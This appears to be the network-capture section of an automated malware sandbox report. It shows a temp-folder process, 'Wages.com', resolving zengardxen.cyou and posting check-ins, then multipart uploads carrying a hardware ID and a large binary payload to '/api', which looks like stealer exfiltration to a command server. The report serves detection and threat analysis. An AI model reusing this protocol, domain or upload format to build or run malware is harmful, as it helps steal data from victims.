                                    Feb 14, 2025 16:56:04.923223019 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.414225101 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.414361954 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.415713072 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.415724039 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.416613102 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.417987108 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.418010950 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.418135881 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960134029 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960257053 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960434914 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960539103 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960561991 CET44349744188.114.97.3192.168.2.4
                                    Feb 14, 2025 16:56:05.960580111 CET49744443192.168.2.4188.114.97.3
                                    Feb 14, 2025 16:56:05.960587025 CET44349744188.114.97.3192.168.2.4
                                     Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                     Feb 14, 2025 16:55:21.955965996 CET | 57130 | 53 | 192.168.2.4 | 1.1.1.1
                                     Feb 14, 2025 16:55:21.963825941 CET | 53 | 57130 | 1.1.1.1 | 192.168.2.4
                                     Feb 14, 2025 16:55:54.656527996 CET | 51185 | 53 | 192.168.2.4 | 1.1.1.1
                                     Feb 14, 2025 16:55:54.680768967 CET | 53 | 51185 | 1.1.1.1 | 192.168.2.4
                                     Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                     Feb 14, 2025 16:55:21.955965996 CET | 192.168.2.4 | 1.1.1.1 | 0x6d9e | Standard query (0) | jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ | A (IP address) | IN (0x0001) | false
                                     Feb 14, 2025 16:55:54.656527996 CET | 192.168.2.4 | 1.1.1.1 | 0xf895 | Standard query (0) | zengardxen.cyou | A (IP address) | IN (0x0001) | false
                                     Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                     Feb 14, 2025 16:55:21.963825941 CET | 1.1.1.1 | 192.168.2.4 | 0x6d9e | Name error (3) | jnYxaqNNmUyHTVQ.jnYxaqNNmUyHTVQ | none | none | A (IP address) | IN (0x0001) | false
                                     Feb 14, 2025 16:55:54.680768967 CET | 1.1.1.1 | 192.168.2.4 | 0xf895 | No error (0) | zengardxen.cyou |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                     Feb 14, 2025 16:55:54.680768967 CET | 1.1.1.1 | 192.168.2.4 | 0xf895 | No error (0) | zengardxen.cyou |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                    • zengardxen.cyou
                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     0 | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                     Timestamp | Bytes transferred | Direction | Data
                                     2025-02-14 15:55:55 UTC | 262 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: zengardxen.cyou
                                     2025-02-14 15:55:55 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                     2025-02-14 15:55:55 UTC | 1120 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:55 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=1cpucpeinm7oehb3bf26pncufa; expires=Sat, 15 Feb 2025 15:55:55 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XY%2FEv63IkGEtSZxhJBLX0YuJuSseS3Ne2%2FQYLGqTiJHpvzOTTIsIRtLod8P9uu8R1AFUlHXXtRZI2RmsHQWZwQBVe4ZCVIyEZpJkM%2B7re6StIxd5imGr47GUQKeCiWAYHAg%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ec67972d6c8-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7550&min_rtt=7527&rtt_var=2869&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=906&delivery_rate=378630&cwnd=32&unsent_bytes=0&cid=141b543dfb3e0db7&ts=532&x=0"
                                     2025-02-14 15:55:55 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                     2025-02-14 15:55:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     1 | 192.168.2.4 | 49738 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                     Timestamp | Bytes transferred | Direction | Data
                                     2025-02-14 15:55:56 UTC | 263 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 46
                                    Host: zengardxen.cyou
                                     2025-02-14 15:55:56 UTC | 46 | OUT | Data Raw: 61 63 74 3d 72 65 63 65 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 6d 6d 6d 26 6a 3d
                                    Data Ascii: act=receive_message&ver=4.0&lid=WG6I6S--mmm&j=
                                     2025-02-14 15:55:56 UTC | 1122 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=vmsl4rqdpqj9f3rfa0hplqkhrq; expires=Sat, 15 Feb 2025 15:55:56 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=367C8JnYmyG7FYTyhVlxRML%2FwY6b7xGkqPSk13WhkuAGiQs%2FiV0mBlv%2BUyofx9thUfm6%2FojttBqsRLQmVAIMnSqgCJvZgud5oXPjaJb3xP45yMII4nTTBuIxxFz0bfLPuOs%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3eccdefc82ff-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7317&min_rtt=7271&rtt_var=2759&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=945&delivery_rate=401595&cwnd=32&unsent_bytes=0&cid=a0a71d8a7ecade2e&ts=625&x=0"


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     2 | 192.168.2.4 | 49739 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                     Timestamp | Bytes transferred | Direction | Data
                                     2025-02-14 15:55:57 UTC | 281 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=O8W7XY041YOVJERDM2
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 18163
                                    Host: zengardxen.cyou
                                     2025-02-14 15:55:57 UTC | 15331 | OUT | Data Raw: 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 38 57 37 58 59 30 34 31 59 4f 56 4a 45 52 44 4d 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a
                                    Data Ascii: --O8W7XY041YOVJERDM2Content-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--O8W7XY041YOVJERDM2Content-Disposition: form-data; name="pid"2--O8W7XY041YOVJERDM2Content-Disposition: form-data; name="lid"WG6I6S--mmm
                                     2025-02-14 15:55:58 UTC | 1121 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=3ltdt1ro36reu7iu94dlrvd3te; expires=Sat, 15 Feb 2025 15:55:57 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dN4QTe8ZqFtPGcOF8E3q%2F4Ct0ZKF9Td8p1v4feGmwKPA8wfa0ZEJPQMDlCUF39sig1kC1wqTYIw6BXCd2GXAm2cCr8yOaG8TCXgkpLJCoup7ljbYk4NNXVJJ8UqKBS8RxVg%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ed478b7c5b9-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7229&min_rtt=7219&rtt_var=2728&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2836&recv_bytes=19124&delivery_rate=399780&cwnd=32&unsent_bytes=0&cid=cb31811d2df1b9d6&ts=1361&x=0"
                                     2025-02-14 15:55:58 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                     2025-02-14 15:55:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                     Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                     3 | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                     Timestamp | Bytes transferred | Direction | Data
                                     2025-02-14 15:55:59 UTC | 278 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=L1XEQBKUETKEOFX6
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8772
                                    Host: zengardxen.cyou
                                     2025-02-14 15:55:59 UTC | 8772 | OUT | Data Raw: 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4c 31 58 45 51 42 4b 55 45 54 4b 45 4f 46 58 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 4c 31 58 45
                                    Data Ascii: --L1XEQBKUETKEOFX6Content-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--L1XEQBKUETKEOFX6Content-Disposition: form-data; name="pid"2--L1XEQBKUETKEOFX6Content-Disposition: form-data; name="lid"WG6I6S--mmm--L1XE
                                    2025-02-14 15:55:59 UTC | 1130 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:55:59 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=u1f5or45to0app1vqkfuvg7knf; expires=Sat, 15 Feb 2025 15:55:59 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BeKYehu0MGtkgC%2BPdWR5N7YAgUZGcoo8CPHYg3kPVUOhav9hZzcyB5ozC5VNA5nG%2F4rQTV95nJq%2FXWowE4Nm%2Bf4Jw%2Fhru2Jdy8q54dgGGfjqksQ%2BRXJEJsRGMRB3PPVXf9A%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ee02ae3e5e8-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=6732&min_rtt=6724&rtt_var=2538&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2837&recv_bytes=9708&delivery_rate=429854&cwnd=32&unsent_bytes=0&cid=e76cb0e657288d6b&ts=581&x=0"
                                    2025-02-14 15:55:59 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:55:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    4 | 192.168.2.4 | 49741 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-02-14 15:56:00 UTC | 271 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=0NOQB56K
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 20377
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:00 UTC15331OUTData Raw: 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 30 4e 4f 51 42 35 36 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f
                                    Data Ascii: --0NOQB56KContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--0NOQB56KContent-Disposition: form-data; name="pid"3--0NOQB56KContent-Disposition: form-data; name="lid"WG6I6S--mmm--0NOQB56KContent-Dispositio
                                    2025-02-14 15:56:00 UTC5046OUTData Raw: b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1 d7 cc 07 00 00 00 00
                                    Data Ascii: Mn 64F6(X&7~`aO@dR<x)
                                    2025-02-14 15:56:01 UTC | 1123 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=itk3u17n95c5ltnfcvacn02mq3; expires=Sat, 15 Feb 2025 15:56:00 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCKnC5IbztwJyLlfIvuRZ0XFAWpp8QZeVRo%2FSpL5aTsRM941ZRixzNln5PZmXs9pnd2h9Y94xBT5VghjK6hXNHVu3eCv6wPK4WdnIQelRIN4hxLpbUnnYsUVcX%2BSAArN3w8%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3ee72af4428f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=640&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21328&delivery_rate=1707602&cwnd=115&unsent_bytes=0&cid=45c4f08398c76d7d&ts=763&x=0"
                                    2025-02-14 15:56:01 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:56:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    5 | 192.168.2.4 | 49742 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-02-14 15:56:01 UTC | 273 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=WF1N3UL2JOP
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 2617
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:01 UTC2617OUTData Raw: 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 57 46 31 4e 33 55 4c 32 4a 4f 50 0d 0a 43 6f 6e 74 65 6e
                                    Data Ascii: --WF1N3UL2JOPContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--WF1N3UL2JOPContent-Disposition: form-data; name="pid"1--WF1N3UL2JOPContent-Disposition: form-data; name="lid"WG6I6S--mmm--WF1N3UL2JOPConten
                                    2025-02-14 15:56:02 UTC | 1127 | IN | HTTP/1.1 200 OK
                                    Date: Fri, 14 Feb 2025 15:56:02 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Vary: Accept-Encoding
                                    Set-Cookie: PHPSESSID=1cgam8mrdigorek9fhg3qf060q; expires=Sat, 15 Feb 2025 15:56:02 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bkms3Pt8uG1vUyi9vsSUBsDT5QBfRhb6a6cR%2Faf%2FCdv06eAMELQTNtMhTyWBy%2BpFMqlldYsswuasx1vMP5rO2YGosHn5GjVzsniGVuLcTvbJn0%2FEyrHASn6CNtf7Ql1Z%2F%2Fs%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 911e3eef6ce87004-IAD
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=7388&min_rtt=7373&rtt_var=2776&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=3526&delivery_rate=396039&cwnd=32&unsent_bytes=0&cid=f3378452d5cd68df&ts=645&x=0"
                                    2025-02-14 15:56:02 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                    Data Ascii: fok 8.46.123.189
                                    2025-02-14 15:56:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    6 | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | 7884 | C:\Users\user\AppData\Local\Temp\562639\Wages.com
                                    Timestamp | Bytes transferred | Direction | Data
                                    2025-02-14 15:56:03 UTC | 277 | OUT | POST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: multipart/form-data; boundary=64YFSWT7I6O5L
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 558936
                                    Host: zengardxen.cyou
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 30 43 38 36 43 31 44 46 44 42 38 36 45 41 43 32 42 41 43 34 41 32 44 30 31 45 39 45 44 44 45 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 6d 6d 6d 0d 0a 2d 2d 36 34 59 46 53 57 54 37 49 36 4f 35 4c
                                    Data Ascii: --64YFSWT7I6O5LContent-Disposition: form-data; name="hwid"00C86C1DFDB86EAC2BAC4A2D01E9EDDE--64YFSWT7I6O5LContent-Disposition: form-data; name="pid"1--64YFSWT7I6O5LContent-Disposition: form-data; name="lid"WG6I6S--mmm--64YFSWT7I6O5L
                                    2025-02-14 15:56:03 UTC15331OUTData Raw: 75 5e 54 77 2c a6 ee e2 c9 c9 cf 27 40 0a da 18 37 7a ce f1 f9 41 35 47 90 71 1b cc 63 ea e2 0e 33 66 64 c0 77 ce c7 91 f2 59 f6 5c 90 1e 78 c9 bf a8 54 0a 5e 09 6e ec a8 87 d3 4f 08 6c 9c 20 a2 bb b5 e1 1a 1a 32 ec 98 28 f6 74 4f b0 d6 38 61 b1 03 03 1a 05 d9 67 08 40 6b 48 a5 ae 0a 55 bf f5 ea bd e6 62 d5 c7 2a 8f 21 cc c2 4e 57 3b 34 fd d4 d0 ad 37 7d 39 1f b7 de 8e fd 3c 56 71 be ea b8 60 a9 5f 63 f7 4d c9 aa 6f 48 03 d5 b5 98 0b ef 79 76 e4 29 c2 3b 98 c5 71 12 60 dd 5a a1 6e 33 cc e9 17 50 8e 08 4e 9d 9f 3b 25 b0 b1 3a 71 d8 07 02 fd 6f 05 67 65 b5 e6 36 4b 90 76 23 01 7c 33 c3 fe 96 9d c6 81 59 4b 77 30 7c 02 05 1f c8 39 88 08 3a ec 7c 17 d4 8b 88 12 89 b0 0d d6 ee cf c4 b9 8c f4 54 96 c5 eb da 18 b1 c5 cf dd 9d d2 96 12 bc 42 42 64 8d 1d e6 8f e4
